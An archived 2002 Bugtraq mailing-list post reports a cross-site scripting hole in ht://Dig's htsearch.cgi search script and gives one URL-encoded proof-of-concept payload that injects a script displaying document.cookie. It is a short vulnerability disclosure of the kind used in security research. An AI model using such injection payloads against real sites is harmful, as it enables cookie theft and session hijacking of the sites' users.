[25963] in bugtraq

home	help	back	first	fref	pref	prev	next	nref	lref	last	post

XSS in HTDIG

daemon@ATHENA.MIT.EDU (Howard Yeend)
Thu Jun 27 01:13:28 2002

Message-ID: <20020626083848.41999.qmail@web20304.mail.yahoo.com>
Date: Wed, 26 Jun 2002 01:38:48 -0700 (PDT)
From: Howard Yeend <h_bugtraq@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Eg;

http://www.anyhost.com/cgi-bin/htsearch.cgi?words=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

(all URLS must be on one line)

Apologies if this is a known issue.
Apologies also for posting about XSS, too, but
this is not an isolated website, but a commonly
used service.

=====
-----BEGIN GEEK CODE BLOCK-----
  Version: 3.1 www.geekcode.com
GIT d--(---) s-:-- a-- C++++ UL@ P--- L++>+++ E---(-) W+++(-)$ N-(--) o-- K++ w(+)(-) O? !M ?V(-) PS+++@ PE-- Y+ PGP++ t+ 5-(++) X(+) R tv(--) b+>+++ DI++ D-(Quake+++) G+++ e* h r++>+++ y+(+++)
-----END GEEK CODE BLOCK-----

__________________________________________________
Do You Yahoo!?
Yahoo! - Official partner of 2002 FIFA World Cup
http://fifaworldcup.yahoo.com

home	help	back	first	fref	pref	prev	next	nref	lref	last	post